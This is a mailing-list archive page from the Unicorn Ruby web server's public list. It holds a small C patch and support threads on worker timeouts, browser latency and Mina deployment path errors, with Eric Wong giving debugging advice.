diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index de83652..932d259 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -926,7 +926,7 @@ void Init_unicorn_http(void)
 {
   VALUE mUnicorn, cHttpParser;
 
-  mUnicorn = rb_const_get(rb_cObject, rb_intern("Unicorn"));
+  mUnicorn = rb_define_module("Unicorn");
   cHttpParser = rb_define_class_under(mUnicorn, "HttpParser", rb_cObject);
   eHttpParserError =
          rb_define_class_under(mUnicorn, "HttpParserError", rb_eIOError);
-- 
EW


^ permalink raw reply related	[relevance 2%]

* Re: Unicorn workers timing out intermittently
  2014-12-30 18:12  0% ` Eric Wong
@ 2014-12-30 20:02  0%   ` Aaron Price
  0 siblings, 0 replies; 200+ results
From: Aaron Price @ 2014-12-30 20:02 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Thanks for your help, Eric.

I was able to pinpoint the issue, and I've posted the solution.

The issue was that I wasn't closing a database connection for code being
run in custom Rack middleware, which is why the logs didn't show anything.

http://serverfault.com/questions/655430/unicorn-workers-timing-out-intermittently/655478#655478
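
Roughly, the kind of fix it amounts to (the middleware name here is made
up, the real code is in the answer above):

    class SlowRequestTracker    # hypothetical middleware that touches the DB
      def initialize(app)
        @app = app
      end

      def call(env)
        @app.call(env)
      ensure
        # return any connection checked out during this request to the pool;
        # without this the pool eventually starves and workers appear to hang
        ActiveRecord::Base.clear_active_connections!
      end
    end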

Thanks again.


On Tue, Dec 30, 2014 at 1:12 PM, Eric Wong <e@80x24.org> wrote:

> Aaron Price <aprice@flipgive.com> wrote:
> > Hey guys,
> >
> > I'm having the following issue and I was hoping you might be able to shed
> > some light on the issue. Maybe give some suggestions on how to debug the
> > actual problem.
> >
> >
> http://serverfault.com/questions/655430/unicorn-workers-timing-out-intermittently
>
> (quoting the problem in full to save folks from having to load the page)
>
> >    I'm getting intermittent timeouts from unicorn workers for seemingly
> no
> >    reason, and I'd like some help to debug the actual problem. It's worse
> >    because it works about 10 - 20 requests then 1 will timeout, then
> >    another 10 - 20 requests and the same thing will happen again.
> >
> >    I've created a dev environment to illustrate this particular problem,
> >    so there is NO traffic except mine.
> >
> >    The stack is Ubuntu 14.04, Rails 3.2.21, PostgreSQL 9.3.4, Unicorn
> >    4.8.3, Nginx 1.6.2.
> >
> >    The Problem
> >
> >    I'll describe in detail the time that it doesn't work.
> >
> >    I request a url through the browser.
> > Started GET
> "/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T1
> > 8:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z"
> for 127.0
> > .0.1 at 2014-12-30 15:58:59 +0000
> > Completed 200 OK in 10.3ms (Views: 0.0ms | ActiveRecord: 2.1ms)
> >
> >    As you can see, the request completed successfully with a 200 response
> >    status in just 10.3ms.
> >
> >    However, the browser hangs for about 30 seconds and Unicorn kills the
> >    worker:
> > E, [2014-12-30T15:59:30.267605 #13678] ERROR -- : worker=0 PID:14594
> timeout (31
> > s > 30s), killing
> > E, [2014-12-30T15:59:30.279000 #13678] ERROR -- : reaped
> #<Process::Status: pid
> > 14594 SIGKILL (signal 9)> worker=0
> > I, [2014-12-30T15:59:30.355085 #23533]  INFO -- : worker=0 ready
> >
> >    And the following error in the Nginx logs:
> > 2014/12/30 15:59:30 [error] 23463#0: *27 upstream prematurely closed
> connection
> > while reading response header from upstream, client: 127.0.0.1, server:
> localhos
> > t, request: "GET
> /offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-
> >
> 28T18:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z
> HTTP/1
> > .1", upstream: "http://unix:
> /app/shared/tmp/sockets/unicorn.sock:/offers.xml?q%5
> >
> bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:01:16Z&q%5bupdated_at_less
> > _than_or_equal_to%5d=2014-12-28T19:30:21Z", host: "localhost", referrer:
> "http:/
> >
> /localhost/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:0
> > 1:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z"
>
> OK, the problem should be reproducible hitting unicorn directly (easy to
> configure a TCP listener) and eliminating nginx as a possible
> point-of-failure.  Also, I suggest using curl so you can script and see
> everything going on more easily at the protocol/syscall level.
>
> >    Again. There's no load on the server at all. The only requests going
> >    through are my own and every 10 - 20 requests at random have this same
> >    problem.
>
> OK, the main culprit is usually external connections acting up.  Postgres,
> external monitoring services, network failures, etc...
>
> >    It doesn't look like unicorn is eating memory at all. I know this
> >    because I'm using watch -n 0.5 free -m and this is the result.
>
> What does the CPU usage look like?
>
> >              total       used       free     shared    buffers     cached
> > Mem:          1995        765       1229          0         94        405
> > -/+ buffers/cache:        264       1730
> > Swap:          511          0        511
> >
> >    So the server isn't running out of memory.
> >
> >    Is there anything further I can do to debug this issue? or any insight
> >    into what's happening?
>
> Basically, minimize and isolate things.  Use a single worker, strace
> that worker ("strace -f -p $PID_OF_WORKER") and send a request to it
> using curl.
>
> Is the Postgres doing OK?  How is the network connection to that?
> What other external resources (monitoring services, memcached, redis,
> etc...) might you be hitting?  You'll see blocking (on things like
> read*/write*/select/poll/recvmsg/sendmsg) on strace.
>
> You can map numeric file descriptors to ports via:
>  lsof -p $PID_OF_WORKER
>
> Also, is your server running out of entropy?  (You'll see blocking on
> reading /dev/random via strace) and you may also see low values in
> /proc/sys/kernel/random/entropy_avail
>



-- 
*Aaron Price*
Sr. Web Developer
FlipGive
P: (416) 583-2510

312 Adelaide St. West, Suite 301
Toronto, ON, M5V 1R2
www.flipgive.com

Follow us on: Facebook <http://www.facebook.com/FlipGive> | Twitter
<http://twitter.com/FlipGive> | LinkedIn
<http://www.linkedin.com/company/FlipGive>


^ permalink raw reply	[relevance 0%]

* Re: Unicorn workers timing out intermittently
  @ 2014-12-30 18:12  0% ` Eric Wong
  2014-12-30 20:02  0%   ` Aaron Price
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-12-30 18:12 UTC (permalink / raw)
  To: Aaron Price; +Cc: unicorn-public

Aaron Price <aprice@flipgive.com> wrote:
> Hey guys,
> 
> I'm having the following issue and I was hoping you might be able to shed
> some light on the issue. Maybe give some suggestions on how to debug the
> actual problem.
> 
> http://serverfault.com/questions/655430/unicorn-workers-timing-out-intermittently

(quoting the problem in full to save folks from having to load the page)

>    I'm getting intermittent timeouts from unicorn workers for seemingly no
>    reason, and I'd like some help to debug the actual problem. It's worse
>    because it works about 10 - 20 requests then 1 will timeout, then
>    another 10 - 20 requests and the same thing will happen again.
> 
>    I've created a dev environment to illustrate this particular problem,
>    so there is NO traffic except mine.
> 
>    The stack is Ubuntu 14.04, Rails 3.2.21, PostgreSQL 9.3.4, Unicorn
>    4.8.3, Nginx 1.6.2.
> 
>    The Problem
> 
>    I'll describe in detail the time that it doesn't work.
> 
>    I request a url through the browser.
> Started GET "/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T1
> 8:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z" for 127.0
> .0.1 at 2014-12-30 15:58:59 +0000
> Completed 200 OK in 10.3ms (Views: 0.0ms | ActiveRecord: 2.1ms)
> 
>    As you can see, the request completed successfully with a 200 response
>    status in just 10.3ms.
> 
>    However, the browser hangs for about 30 seconds and Unicorn kills the
>    worker:
> E, [2014-12-30T15:59:30.267605 #13678] ERROR -- : worker=0 PID:14594 timeout (31
> s > 30s), killing
> E, [2014-12-30T15:59:30.279000 #13678] ERROR -- : reaped #<Process::Status: pid
> 14594 SIGKILL (signal 9)> worker=0
> I, [2014-12-30T15:59:30.355085 #23533]  INFO -- : worker=0 ready
> 
>    And the following error in the Nginx logs:
> 2014/12/30 15:59:30 [error] 23463#0: *27 upstream prematurely closed connection
> while reading response header from upstream, client: 127.0.0.1, server: localhos
> t, request: "GET /offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-
> 28T18:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z HTTP/1
> .1", upstream: "http://unix:/app/shared/tmp/sockets/unicorn.sock:/offers.xml?q%5
> bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:01:16Z&q%5bupdated_at_less
> _than_or_equal_to%5d=2014-12-28T19:30:21Z", host: "localhost", referrer: "http:/
> /localhost/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:0
> 1:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z"

OK, the problem should be reproducible hitting unicorn directly (easy to
configure a TCP listener) and eliminating nginx as a possible
point-of-failure.  Also, I suggest using curl so you can script and see
everything going on more easily at the protocol/syscall level.
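
For example, something along these lines (address and port are up to you)
takes nginx out of the picture entirely:

    # unicorn_debug.rb -- single worker on a plain TCP listener
    worker_processes 1
    listen "127.0.0.1:8080", :tcp_nodelay => true
    timeout 30
    stderr_path "log/unicorn.debug.log"

Then hit 127.0.0.1:8080 with curl directly.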

>    Again. There's no load on the server at all. The only requests going
>    through are my own and every 10 - 20 requests at random have this same
>    problem.

OK, the main culprit is usually external connections acting up.  Postgres,
external monitoring services, network failures, etc...

>    It doesn't look like unicorn is eating memory at all. I know this
>    because I'm using watch -n 0.5 free -m and this is the result.

What does the CPU usage look like?

>              total       used       free     shared    buffers     cached
> Mem:          1995        765       1229          0         94        405
> -/+ buffers/cache:        264       1730
> Swap:          511          0        511
> 
>    So the server isn't running out of memory.
> 
>    Is there anything further I can do to debug this issue? or any insight
>    into what's happening?

Basically, minimize and isolate things.  Use a single worker, strace
that worker ("strace -f -p $PID_OF_WORKER") and send a request to it
using curl.

Is the Postgres doing OK?  How is the network connection to that?
What other external resources (monitoring services, memcached, redis,
etc...) might you be hitting?  You'll see blocking (on things like
read*/write*/select/poll/recvmsg/sendmsg) on strace.

You can map numeric file descriptors to ports via:
 lsof -p $PID_OF_WORKER

Also, is your server running out of entropy?  (You'll see blocking on
reading /dev/random via strace) and you may also see low values in
/proc/sys/kernel/random/entropy_avail

^ permalink raw reply	[relevance 0%]

* RE: Issue with Unicorn: Big latency when getting a request
  @ 2014-11-14 22:36  3%                     ` Roberto Cordoba del Moral
  0 siblings, 0 replies; 200+ results
From: Roberto Cordoba del Moral @ 2014-11-14 22:36 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public@bogomips.org

I have tested with 5 workers and still the same issue.
It's strange; if this were happening to everyone, it would be a better-known problem. I have searched everywhere on the Internet and couldn't find anything related to it.
My guess is that I probably have something in my Rails code related to sessions or cookies that is handled differently by the browsers, but is also tied to the application server.
I don't know. Although I'm really curious about the issue and would love to figure it out, I think I will try Puma.
Thank you so much for your time.

> Date: Fri, 14 Nov 2014 18:34:34 +0000
> From: e@80x24.org
> To: roberto.chingon@hotmail.com
> CC: unicorn-public@bogomips.org
> Subject: Re: Issue with Unicorn: Big latency when getting a request
> 
> Roberto Cordoba del Moral <roberto.chingon@hotmail.com> wrote:
> > I have installed Puma and it's working.
> > It's the combination of Unicorn and Chrome which is not working. I
> > don't know why.
> 
> Just curious, can you try configuring "worker_processes 4" in unicorn
> (or maybe increase 4 to 8 or any hihgher number if you have enough
> memory).  If extra workers works, it's definitely the lack of baked-in
> concurrency in unicorn (this is by design).
> 
> So I suspect puma (or any other server) is better for your use case
> anyways.

^ permalink raw reply	[relevance 3%]

* Re: Having issue with Unicorn
  2014-10-24 20:35  0%                           ` Imdad
@ 2014-10-24 20:39  0%                             ` Imdad
  0 siblings, 0 replies; 200+ results
From: Imdad @ 2014-10-24 20:39 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

The log file under the "/var/www/hailisys/releases/shared" folder has the
following error logs:

root@Hailisys:/var/www/hailisys/releases/shared# tail -n 20 -f
log/unicorn.stderr.log
I, [2014-10-24T16:28:27.289186 #12384]  INFO -- : listening on addr=
0.0.0.0:3000 fd=10
F, [2014-10-24T16:28:27.289460 #12384] FATAL -- : error adding listener
addr=/var/www/hailisys/releases/shared/sockets/unicorn.sock
/var/www/hailisys/releases/17/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/socket_helper.rb:158:in
`initialize': No such file or directory - connect(2) for
"/var/www/hailisys/releases/shared/sockets/unicorn.sock" (Errno::ENOENT)
from
/var/www/hailisys/releases/17/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/socket_helper.rb:158:in
`new'


Cheers!
Imdad Ali Khan
Mob (0) 9818484057
http://www.linkedin.com/in/imdad

On 25 October 2014 02:05, Imdad <khanimdad@gmail.com> wrote:

> Sorry Eric, but the site (http://104.131.74.69/) is still not working.
> It shows the error "We're sorry, but something went wrong."
>
> Cheers!
> Imdad Ali Khan
> Mob (0) 9818484057
> http://www.linkedin.com/in/imdad
>
> On 25 October 2014 01:47, Eric Wong <e@80x24.org> wrote:
>
>> Imdad <khanimdad@gmail.com> wrote:
>> > Nope, still its not working, same error as below
>>
>> I'm not sure what you mean...  Can you access the site OK?
>>
>> > I, [2014-10-24T19:56:16.054817 #18256]  INFO -- : executing
>> > ["/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/bin/unicorn", "-c",
>> > "/var/www/hailisys/current/config/unicorn.rb", "-D", "-E", "production",
>> > {11=>#<Kgio::UNIXServer:fd 11>}] (in /var/www/hailisys/releases/31)
>> > I, [2014-10-24T19:56:16.626199 #18256]  INFO -- : inherited
>> > addr=/var/www/hailisys/shared/sockets/unicorn.sock fd=11
>> > I, [2014-10-24T19:56:16.626930 #18256]  INFO -- : Refreshing Gem list
>> > I, [2014-10-24T19:56:18.723512 #18256]  INFO -- : master process ready
>> > I, [2014-10-24T19:56:18.727108 #18261]  INFO -- : worker=0 ready
>> > I, [2014-10-24T19:56:18.742734 #18264]  INFO -- : worker=1 ready
>> > I, [2014-10-24T19:56:18.921508 #8814]  INFO -- : reaped
>> #<Process::Status:
>> > pid 18246 exit 0> worker=0
>> > I, [2014-10-24T19:56:18.921691 #8814]  INFO -- : reaped
>> #<Process::Status:
>> > pid 18249 exit 0> worker=1
>> > I, [2014-10-24T19:56:18.921776 #8814]  INFO -- : master complete
>>
>> Everything above looks OK.
>>
>
>


^ permalink raw reply	[relevance 0%]

* Re: Having issue with Unicorn
  2014-10-24 20:17  0%                         ` Eric Wong
@ 2014-10-24 20:35  0%                           ` Imdad
  2014-10-24 20:39  0%                             ` Imdad
  0 siblings, 1 reply; 200+ results
From: Imdad @ 2014-10-24 20:35 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Sorry Eric, but the site (http://104.131.74.69/) is still not working.
It shows the error "We're sorry, but something went wrong."

Cheers!
Imdad Ali Khan
Mob (0) 9818484057
http://www.linkedin.com/in/imdad

On 25 October 2014 01:47, Eric Wong <e@80x24.org> wrote:

> Imdad <khanimdad@gmail.com> wrote:
> > Nope, still its not working, same error as below
>
> I'm not sure what you mean...  Can you access the site OK?
>
> > I, [2014-10-24T19:56:16.054817 #18256]  INFO -- : executing
> > ["/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/bin/unicorn", "-c",
> > "/var/www/hailisys/current/config/unicorn.rb", "-D", "-E", "production",
> > {11=>#<Kgio::UNIXServer:fd 11>}] (in /var/www/hailisys/releases/31)
> > I, [2014-10-24T19:56:16.626199 #18256]  INFO -- : inherited
> > addr=/var/www/hailisys/shared/sockets/unicorn.sock fd=11
> > I, [2014-10-24T19:56:16.626930 #18256]  INFO -- : Refreshing Gem list
> > I, [2014-10-24T19:56:18.723512 #18256]  INFO -- : master process ready
> > I, [2014-10-24T19:56:18.727108 #18261]  INFO -- : worker=0 ready
> > I, [2014-10-24T19:56:18.742734 #18264]  INFO -- : worker=1 ready
> > I, [2014-10-24T19:56:18.921508 #8814]  INFO -- : reaped
> #<Process::Status:
> > pid 18246 exit 0> worker=0
> > I, [2014-10-24T19:56:18.921691 #8814]  INFO -- : reaped
> #<Process::Status:
> > pid 18249 exit 0> worker=1
> > I, [2014-10-24T19:56:18.921776 #8814]  INFO -- : master complete
>
> Everything above looks OK.
>


^ permalink raw reply	[relevance 0%]

* Re: Having issue with Unicorn
  2014-10-24 20:09  3%                       ` Imdad
@ 2014-10-24 20:17  0%                         ` Eric Wong
  2014-10-24 20:35  0%                           ` Imdad
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-10-24 20:17 UTC (permalink / raw)
  To: Imdad; +Cc: unicorn-public

Imdad <khanimdad@gmail.com> wrote:
> Nope, still its not working, same error as below

I'm not sure what you mean...  Can you access the site OK?

> I, [2014-10-24T19:56:16.054817 #18256]  INFO -- : executing
> ["/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/bin/unicorn", "-c",
> "/var/www/hailisys/current/config/unicorn.rb", "-D", "-E", "production",
> {11=>#<Kgio::UNIXServer:fd 11>}] (in /var/www/hailisys/releases/31)
> I, [2014-10-24T19:56:16.626199 #18256]  INFO -- : inherited
> addr=/var/www/hailisys/shared/sockets/unicorn.sock fd=11
> I, [2014-10-24T19:56:16.626930 #18256]  INFO -- : Refreshing Gem list
> I, [2014-10-24T19:56:18.723512 #18256]  INFO -- : master process ready
> I, [2014-10-24T19:56:18.727108 #18261]  INFO -- : worker=0 ready
> I, [2014-10-24T19:56:18.742734 #18264]  INFO -- : worker=1 ready
> I, [2014-10-24T19:56:18.921508 #8814]  INFO -- : reaped #<Process::Status:
> pid 18246 exit 0> worker=0
> I, [2014-10-24T19:56:18.921691 #8814]  INFO -- : reaped #<Process::Status:
> pid 18249 exit 0> worker=1
> I, [2014-10-24T19:56:18.921776 #8814]  INFO -- : master complete

Everything above looks OK.

^ permalink raw reply	[relevance 0%]

* Re: Having issue with Unicorn
  @ 2014-10-24 20:09  3%                       ` Imdad
  2014-10-24 20:17  0%                         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Imdad @ 2014-10-24 20:09 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Nope, still its not working, same error as below

Cheers!
Imdad Ali Khan
Mob (0) 9818484057
http://www.linkedin.com/in/imdad

On 25 October 2014 01:36, Eric Wong <e@80x24.org> wrote:

> So it looks like everything at 19:56 was successful and all is good,
> right?
>


^ permalink raw reply	[relevance 3%]

* Re: Having issue with Unicorn
  2014-10-24 18:13  0%     ` Eric Wong
@ 2014-10-24 18:28  0%       ` Imdad
    0 siblings, 1 reply; 200+ results
From: Imdad @ 2014-10-24 18:28 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Updated app_dir and shared_dir as stated here, then did a deploy which went
okay, but my app is still not running and the log spits out the following...

root@Hailisys:/var/www/hailisys/shared/log# tail -n 20 -f
unicorn.stderr.log
I, [2014-10-24T17:28:53.162084 #15819]  INFO -- : executing
["/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn", "-c",
"/var/www/hailisys/current/config/unicorn.rb", "-D", "-E", "production",
{11=>#<Kgio::UNIXServer:fd 11>}] (in /var/www/hailisys/releases/28)
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:475:in
`exec': No such file or directory -
/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn
(Errno::ENOENT)
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:475:in
`block in reexec'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:447:in
`fork'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:447:in
`reexec'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:307:in
`join'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/bin/unicorn:126:in
`<top (required)>'
from
/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn:23:in
`load'
from
/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn:23:in
`<main>'
E, [2014-10-24T17:28:53.440532 #8814] ERROR -- : reaped #<Process::Status:
pid 15819 exit 1> exec()-ed
I, [2014-10-24T18:21:54.882454 #16594]  INFO -- : executing
["/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn", "-c",
"/var/www/hailisys/current/config/unicorn.rb", "-D", "-E", "production",
{11=>#<Kgio::UNIXServer:fd 11>}] (in /var/www/hailisys/releases/29)
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:475:in
`exec': No such file or directory -
/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn
(Errno::ENOENT)
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:475:in
`block in reexec'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:447:in
`fork'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:447:in
`reexec'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:307:in
`join'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/bin/unicorn:126:in
`<top (required)>'
from
/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn:23:in
`load'
from
/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn:23:in
`<main>'
E, [2014-10-24T18:21:55.053890 #8814] ERROR -- : reaped #<Process::Status:
pid 16594 exit 1> exec()-ed


Cheers!
Imdad Ali Khan
Mob (0) 9818484057
http://www.linkedin.com/in/imdad

On 24 October 2014 23:43, Eric Wong <e@80x24.org> wrote:

> Imdad <khanimdad@gmail.com> wrote:
> > Thanks Eric, here is my deploy.rb and config/unicorn.rb
> > NOTE: /releases/6 and /releases/28 both have same error message
> >
> > config/unicorn.rb
> > ==============
> > # Set your full path to application.
> > app_dir = File.expand_path('../../', __FILE__)
> > shared_dir = File.expand_path('../../../shared/', __FILE__)
>
> Using __FILE__ with File.expand_path here gets you in trouble
> because it loses track of symlinks like "current"
>
> The following should be more explicit, I think:
>
>         app_dir = "/var/www/hailisys/current"
>         shared_dir = "/var/www/hailisys/shared"
>
> And the rest of the config/unicorn.rb should pick those up as-is.
>
> > set :deploy_to, '/var/www/hailisys'
>
> Maybe you can export :deploy_to from your deploy config to your
> unicorn invocation to DRY-up your config/unicorn.rb config.
>
> So perhaps, something like:
>
>         app_dir = "#{ENV['deploy_to']}/current"
>         shared_dir = "#{ENV['deploy_to']}/shared"
>


^ permalink raw reply	[relevance 0%]

* Re: Having issue with Unicorn
  2014-10-24 18:02  1%   ` Imdad
@ 2014-10-24 18:13  0%     ` Eric Wong
  2014-10-24 18:28  0%       ` Imdad
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-10-24 18:13 UTC (permalink / raw)
  To: Imdad; +Cc: unicorn-public

Imdad <khanimdad@gmail.com> wrote:
> Thanks Eric, here is my deploy.rb and config/unicorn.rb
> NOTE: /releases/6 and /releases/28 both have same error message
> 
> config/unicorn.rb
> ==============
> # Set your full path to application.
> app_dir = File.expand_path('../../', __FILE__)
> shared_dir = File.expand_path('../../../shared/', __FILE__)

Using __FILE__ with File.expand_path here gets you in trouble
because it loses track of symlinks like "current"

The following should be more explicit, I think:

	app_dir = "/var/www/hailisys/current"
	shared_dir = "/var/www/hailisys/shared"

And the rest of the config/unicorn.rb should pick those up as-is.

> set :deploy_to, '/var/www/hailisys'

Maybe you can export :deploy_to from your deploy config to your
unicorn invocation to DRY-up your config/unicorn.rb config.

So perhaps, something like:

	app_dir = "#{ENV['deploy_to']}/current"
	shared_dir = "#{ENV['deploy_to']}/shared"

^ permalink raw reply	[relevance 0%]

* Re: Having issue with Unicorn
  @ 2014-10-24 18:02  1%   ` Imdad
  2014-10-24 18:13  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Imdad @ 2014-10-24 18:02 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Thanks Eric, here is my deploy.rb and config/unicorn.rb
NOTE: /releases/6 and /releases/28 both have the same error message

config/unicorn.rb
==============
# Set your full path to application.
app_dir = File.expand_path('../../', __FILE__)
shared_dir = File.expand_path('../../../shared/', __FILE__)

# Set unicorn options
worker_processes 2
preload_app true
timeout 30

# Fill path to your app
working_directory app_dir

# Set up socket location
listen "#{shared_dir}/sockets/unicorn.sock", :backlog => 64

# Loging
stderr_path "#{shared_dir}/log/unicorn.stderr.log"
stdout_path "#{shared_dir}/log/unicorn.stdout.log"

# Set master PID location
pid "#{shared_dir}/pids/unicorn.pid"

before_fork do |server, worker|
  defined?(ActiveRecord::Base) and ActiveRecord::Base.connection.disconnect!
  old_pid = "#{server.config[:pid]}.oldbin"
  if File.exists?(old_pid) && server.pid != old_pid
    begin
      sig = (worker.nr + 1) >= server.worker_processes ? :QUIT : :TTOU
      Process.kill(sig, File.read(old_pid).to_i)
    rescue Errno::ENOENT, Errno::ESRCH
      # someone else did our job for us
    end
  end
end

after_fork do |server, worker|
  defined?(ActiveRecord::Base) and ActiveRecord::Base.establish_connection
end

before_exec do |server|
  ENV['BUNDLE_GEMFILE'] = "#{app_dir}/Gemfile"
end

deploy.rb
==========
require 'mina/bundler'
require 'mina/rails'
require 'mina/git'
require 'mina/rbenv'  # for rbenv support. (http://rbenv.org)
# require 'mina/rvm'    # for rvm support. (http://rvm.io)
# TODO: Look into this later
#require 'mina_sidekiq/tasks'
require 'mina/unicorn'


# Basic settings:
#   domain       - The hostname to SSH to.
#   deploy_to    - Path to deploy into.
#   repository   - Git repo to clone from. (needed by mina/git)
#   branch       - Branch name to deploy. (needed by mina/git)
set_default :rbenv_path, "/root/.rbenv" #{}"/root/.rbenv"
#set_default :bundle_path, '/root/.rbenv/shims/bundle'
#set_default :bundle_bin, 'bundle exec'

set :domain, '104.131.74.69'

set :deploy_to, '/var/www/hailisys'

set :repository, 'https://gitlab.com/hailisys/hailisys.git'
set :branch, 'master'
set :user, 'root'
set :forward_agent, true
# MOIN: Fix Password issue
set :term_mode, nil
# MOIN: Could be staging, production
set :rails_env, 'production'
set :port, '22'
set :unicorn_pid, "#{deploy_to}/shared/pids/unicorn.pid"

# For system-wide RVM install.
#   set :rvm_path, '/usr/local/rvm/bin/rvm'

# Manually create these paths in shared/ (eg: shared/config/database.yml)
in your server.
# They will be linked in the 'deploy:link_shared_paths' step.
set :shared_paths, ['config/database.yml', 'log']

# Optional settings:
#   set :user, 'foobar'    # Username in the server to SSH to.
#   set :port, '30000'     # SSH port number.
#   set :forward_agent, true     # SSH forward_agent.

# This task is the environment that is loaded for most commands, such as
# `mina deploy` or `mina rake`.
task :environment do
  # If you're using rbenv, use this to load the rbenv environment.
  # Be sure to commit your .rbenv-version to your repository.
  invoke :'rbenv:load'

  # For those using RVM, use this to load an RVM version@gemset.
  # invoke :'rvm:use[ruby-1.9.3-p125@default]'
end

# Put any custom mkdir's in here for when `mina setup` is ran.
# For Rails apps, we'll make some of the shared paths that are shared
between
# all releases.

task :setup => :environment do
  queue! %[mkdir -p "#{deploy_to}/shared/log"]
  queue! %[chmod g+rx,u+rwx "#{deploy_to}/shared/log"]

  queue! %[mkdir -p "#{deploy_to}/shared/config"]
  queue! %[chmod g+rx,u+rwx "#{deploy_to}/shared/config"]

  queue! %[mkdir -p "#{deploy_to}/shared/pids"]
  queue! %[chmod g+rx,u+rwx "#{deploy_to}/shared/pids"]

  queue! %[mkdir -p "#{deploy_to}/shared/sockets"]
  queue! %[chmod g+rx,u+rwx "#{deploy_to}/shared/sockets"]

  queue! %[touch "#{deploy_to}/shared/config/database.yml"]
  queue  %[echo "-----> Be sure to edit 'shared/config/database.yml'."]

  # sidekiq needs a place to store its pid file and log file
  queue! %[mkdir -p "#{deploy_to}/shared/pids/"]
  queue! %[chmod g+rx,u+rwx "#{deploy_to}/shared/pids"]
end

desc "Deploys the current version to the server."
task :deploy => :environment do
  deploy do

    # stop accepting new workers
    # TODO: Look into this later
    # invoke :'sidekiq:quiet'

    # Put things that will set up an empty directory into a fully set-up
    # instance of your project.
    invoke :'git:clone'
    invoke :'deploy:link_shared_paths'
    invoke :'bundle:install'
    invoke :'rails:db_migrate'
    invoke :'rails:assets_precompile'
    invoke :'deploy:cleanup'

    to :launch do
      # Passenger
      # queue "mkdir -p #{deploy_to}/#{current_path}/tmp/"
      # queue "touch #{deploy_to}/#{current_path}/tmp/restart.txt"

      # TODO: Look into this later
      # invoke :'sidekiq:restart'
      invoke :'unicorn:restart'
      #invoke :'unicorn:start'
      #queue "touch #{deploy_to}/tmp/restart.txt"

    end
  end
end

# For help in making your deploy script, see the Mina documentation:
#
#  - http://nadarei.co/mina
#  - http://nadarei.co/mina/tasks
#  - http://nadarei.co/mina/settings
#  - http://nadarei.co/mina/helpers

Please suggest what could be wrong.


Cheers!
Imdad Ali Khan
Mob (0) 9818484057
http://www.linkedin.com/in/imdad

On 24 October 2014 23:15, Eric Wong <e@80x24.org> wrote:

> Imdad <khanimdad@gmail.com> wrote:
> > I have rails4, nginx, unicorn and mina for the app deployed
> > http://104.131.74.69/
> >
> > But after deploy hitting on above link results in error, and the log says
> >
> > root@Hailisys:~# tail -n 0 -f
